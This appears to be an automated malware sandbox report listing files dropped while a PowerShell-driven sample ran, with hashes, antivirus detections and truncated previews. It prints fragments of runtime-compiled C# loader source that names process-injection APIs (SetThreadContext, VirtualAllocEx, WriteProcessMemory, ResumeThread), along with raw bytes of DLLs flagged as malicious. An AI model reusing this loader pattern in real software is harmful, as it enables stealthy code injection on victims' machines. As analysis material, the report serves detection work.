                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..E.......s......r...po.....r...po......o.......(......o.......,..o......(....*.........,..4........(....*BSJB............v4.0.30319......l...@...#~......d...#Strings............#US.........#GUID.......`...#Blob...........G.........%3....................................................A.:...z.Z.....Z...............#.....=.:...Q.:.....................(.......P ......H...... ......T.......T.....T...!.T...

                                                          C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.out

                                                          Download File
                                                          Process:C:\Windows\System32\loaddll32.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):684
                                                          Entropy (8bit):5.229321091653673
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L5xOHZxO7KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdBO+Kax5DqBVKVrdFAMBJTH
                                                          MD5:1AD5811F134E42D9262542B136238ED6
                                                          SHA1:A10A9C0B49205EF1B22E548C81FF44206B7BD570
                                                          SHA-256:3781C3ECE608D2962914589766C9028BEC4B5E2897F65F67DEA05D47EDC0498C
                                                          SHA-512:47C2643F8DEA1BE0832FB17271A1C93E38348933374491F64D9BA7CE5BD6770072912796B3AFEFC8D88AF87CC42AE697BAB0CB4DA7844A832232020D81D1D123
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.104345845438577
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryoak7YnqquPN5Dlq5J:+RI+ycuZhN2akSuPNnqX
                                                          MD5:89C638764B6EF75585F9CCE5337EDB1F
                                                          SHA1:D9B40747F46B8356CD780A57E12B30EB5588CAE0
                                                          SHA-256:6BB93DC990BA01C2039A0968B891E9F17D9C4949C64F79149A7D0A6360FF0644
                                                          SHA-512:299B03236EAB0469286670857FCDD44E8C3CA2F7F550CB6E00BEB896AB864FE546007B4300C9941BC6225A1864E1A12F832904C4251D1DEADC7558676CC6E0C3
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.j.t.z.e.y.v.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.j.t.z.e.y.v.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:false
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                          C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):4.970752981659629
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23fEu5XLGzxszICHhJ23fEu5XLhx:p37L/6KidaZdNx
                                                          MD5:14721CDB509279BF52800DAC7772CC07
                                                          SHA1:12025E72AAFC811BDBDD714EE940A86147984E17
                                                          SHA-256:C0795DBADE5849E1B42072B9C8C2EDC9F2636979EB6D84A3F2C6BD8C3EEC8C0F
                                                          SHA-512:6F53F44435FF01D2EE512217C7E055E9930B052344C620CE201530A9DB34E6A4784DA23BC0990AA126CAE605BDC4F3BDF41B42F10F659FE1984A7FC17E68E735
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.66104726414492
                                                          Encrypted:false
                                                          SSDEEP:96:zbuaQZGQf9xPQ2pCa/u67hHJK9IhbpPrjzKcaEZRyH0ljILHqrv5MqJTzeNc+i4K:zCaQHf9WDa/u6PRj2caVUxd5Mq5eNcV
                                                          MD5:D5CD7151A0483D4BBEBA33109953A968
                                                          SHA1:B855A270893EBD87F306639EE121C2B2CEC69C60
                                                          SHA-256:247B9D5359A42D67652ADB01203071C68837C732D5E2A1B9B6D45F01C63662AB
                                                          SHA-512:53C86B8C43F9D4A9F6128EA29972A11DEF93EC776D0784C8467AAC0045C3603A1B8C5C945F84B2E86775298D9EA9C9A46CF8E797B005485CE4CBEAF5B0F55997
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

                                                          C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.242503802577424
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KidaZdNUKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6KidmdNUKax5DqBVKVrdFAMBJTH
                                                          MD5:39BC8B70E3043AFE02773B166941B501
                                                          SHA1:A7BFD11C63F79E85ADA9E4210AEB45F9AABB0212
                                                          SHA-256:C9D33D9D9A26EB573256CEA9FC1F0A00FB0FAC42ECB47041832676C5448C8AEB
                                                          SHA-512:9AE18DE867972501BB2A01728F7DE32199FDB310960A3275B77A9CBD4D5FE6EFDF8F02DEFEE72A7E4F9305F474BC8B6ECBA0E4B46F2F47E63E66D0F333A282DF
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0928674045561166
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCGak7Ynqq5XPN5Dlq5J:+RI+ycuZhN4GakS5XPNnqX
                                                          MD5:FB3536B0D566D3D46ABFAA7ED62832E7
                                                          SHA1:98B2070D6A2228FEFCE3D89147C3B6F584C3493D
                                                          SHA-256:C77DF27630B306C5551CC356B841C37B379E52063F8A9E15C6EE8E01635DF84E
                                                          SHA-512:60F0B28611B3F74F005554F761F0BD92F39C92C302D6A5A401C4B31E4BC5EDE7366A40C949DF2E8B5D3C2F0338058343E729EAB13A5136FDA1DDC6939FD976F9
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.e.j.l.a.b.p.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.e.j.l.a.b.p.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:false
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                          C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):4.905676278124399
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23fWzxszICHhJ23fFyA:p37L/6KiuZNyA
                                                          MD5:659276E535A7A04CCA2346AC4A0CD67E
                                                          SHA1:8A6C5152E91DD883DAF2F743D3D72690BA45083B
                                                          SHA-256:21DDBFE40A50907D12930E5274A2CF2D56D92A55A4CC09F211FE6AA9E4CD3018
                                                          SHA-512:7DEC0664EF81204133CD1BAA766D8CB98DC10A15F5ADB12BBCA51098ACD54562486CA2C4B5324AE38CE7DB9631561A54808DF12A8D640BE1ACF409140AC350B6
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.658402439364922
                                                          Encrypted:false
                                                          SSDEEP:96:hbuaQZGQf9xPQ2pCa/u67hHJl9IhbpPrjzKcaEZRxH0ljILHqrv5MqrhTzeNc+ic:hCaQHf9WDa/u6eRj2ca+Uxd5MqteNc4
                                                          MD5:F70950FBE761A321F6BA0F9F0C3C6C2C
                                                          SHA1:CC7A44B109C7991388F32A9D78375BC9B37350CC
                                                          SHA-256:6885F1B52833738FC2BE8CFF3C89F81488E5FE8B5E392BCAE81C715D3844BB20
                                                          SHA-512:43D87283A5FEE19A2AFA7D62C2F8547A0A33F23BCF1EECBA90D4F35FDF07F0593AA3BD867CDE943D968813F805852DAAC41FF7056FDEDCFCDCB5E9B554659457
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

                                                          C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.22736587693707
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KiuZNy1KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6KiSCKax5DqBVKVrdFAMBJTH
                                                          MD5:1EE9BF39777EA1E92E36382BAFD5B700
                                                          SHA1:96B3340130626881363F952FB06468518852CCE2
                                                          SHA-256:2E654DD345850567D84F4F730E8E2EACD11F257EEA4F46634846CB832524900C
                                                          SHA-512:07A35A73D6B5D33FDD4E8014E9D73655CE5B08581D09495D3DE6D02DBEB3CF4F1EFED44F063BB7F842DEE3821E579AF900FC7E8739DB1B25629CC656E49016C0
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0956467865818293
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzGak7YnqqIXPN5Dlq5J:+RI+ycuZhNpGakSIXPNnqX
                                                          MD5:EBE6E5DB4E32E7684CC2776C2F074837
                                                          SHA1:9FFC96FB9A3D9AE20BF839C6EAA4A8502EBCF371
                                                          SHA-256:D3F8248430187792CFCCD388AE00F1487F670279D96204B7877C09672D988360
                                                          SHA-512:0B49ACC1BA6C5A9535A9BD53A76438B1F7923A4B0AEF36703B06212876EE4D418A4D27FF41CDC08FCC5E7183C07E08BC96BC2159E159F2CB1BFB0521FE04BDF6
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.c.v.5.n.2.s.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.c.v.5.n.2.s.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):10583
                                                          Entropy (8bit):4.487855797297623
                                                          Encrypted:false
                                                          SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                          MD5:B022C6FE4494666C8337A975D175C726
                                                          SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                          SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                          SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                          Malicious:true
                                                          Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                          C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):206
                                                          Entropy (8bit):5.060678924711215
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2L/6K2CHhJ23flZXUzxszICHhJ23flZBn:p37L/6KifXUZfBn
                                                          MD5:7207CEE83E4A2E084F245404175D6646
                                                          SHA1:4A8A81357D6A7DD28F87C0201E554FEC4B177069
                                                          SHA-256:F05E207C4621DFB6396E8CFA4C443FC12074498CA49DBD6AAA5EB7763D2E512B
                                                          SHA-512:356F778B3398159DC58FA3B59AAA5F623A7B0F0693DF35B4BB302D2BF18FCDE264352CAD497D137A4659B8D7AAF01C6D1F0F15EB7C788CA1F0DD6F740C279999
                                                          Malicious:false
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):8704
                                                          Entropy (8bit):4.659611677125934
                                                          Encrypted:false
                                                          SSDEEP:192:FCaQHf9WDa/u6tRj2cazUxd5Mqy0seNcb:6WDlw95i05Mqn/yb
                                                          MD5:360C4654FE8D27AE3120FD49665544F8
                                                          SHA1:B50A1FEBD1DA1F16FA108C6233C3EB229C9926AD
                                                          SHA-256:136DCE149EBE0F1B93AC4E33E9F690198172E95EDBB5F625749B67712D258ECB
                                                          SHA-512:83444E177E241277101B08BFC518B906FBD83568988E57E209697F7B047E51F6CC38041EECCB02885C549E847CAC245488E4263CDC6F2AAE5D4789A3C97FEC37
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

                                                          C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.out

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):705
                                                          Entropy (8bit):5.222459946656785
                                                          Encrypted:false
                                                          SSDEEP:12:K8/qR37L/6KifXUZfBuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOqdn6KifXMfkKax5DqBVKVrdFAMBJTH
                                                          MD5:41B10FCE25C40F5DD3E290A4B2569544
                                                          SHA1:054D84D4485B0F72AD82AF423C51AC3060B3CF5D
                                                          SHA-256:16A5287E678960938C9B854F709F7D22B2068739F61D863FFA54CD5ED177BF69
                                                          SHA-512:C3FD4A8CAC98CC0795170BFD3B757BE8B3573D0B53CD75F0D7089E36613D8A94EDD832EFDDEEBB5880CF47586B0B8D14EF1AF5A0B4FD78209B48F2349EB2EB19
                                                          Malicious:false
                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.109708838713356
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryCYak7YnqqJNPN5Dlq5J:+RI+ycuZhN1akSzPNnqX
                                                          MD5:7ED8ED21A61A5FB430E1DFD39D27F332
                                                          SHA1:DBAEA1BCC4F004ADF6634B7147DFF868572960D0
                                                          SHA-256:B52005BAC6B4FE728F4AB498FE5CFEA22823277CE0D4EE23853A81F0C6FE686B
                                                          SHA-512:3F75E90D3C28C19C30CC56BD5DF049C0B2B3356B3A66973E018F2D92E006507CE9598CECB1830938A6F0B8A829DAB65F74C56BEDFA842A7F310A1EC271EDC917
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.h.g.z.z.q.q.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.h.g.z.z.q.q.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                          C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.0.cs

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):724
                                                          Entropy (8bit):4.782753816020807
                                                          Encrypted:false
                                                          SSDEEP:12:V/DTLDauCiQnFOd6FTtf8FkxmaTqTy2dn7+o0zNLmiRSLFUQCL:JjbCiKFc6FowJ2xaoiN3RGUNL
                                                          MD5:99382B41100168F76538CFBD7C420DE5
                                                          SHA1:8C4097E9A57C6CD198C39DC42EF913F14263D211
                                                          SHA-256:096719AB4C6A1F5BAE559122034A423DBCEAF015653FD567263704015D2A2099
                                                          SHA-512:225CEE697ACB1972EBCB1C4E131EA254E6C6D60BE0DA0476D99FA4275C92FBEB27556B74540AD15B007E23B09F621805F4C759D9701BAAD386C9A179C58332FD
                                                          Malicious:false
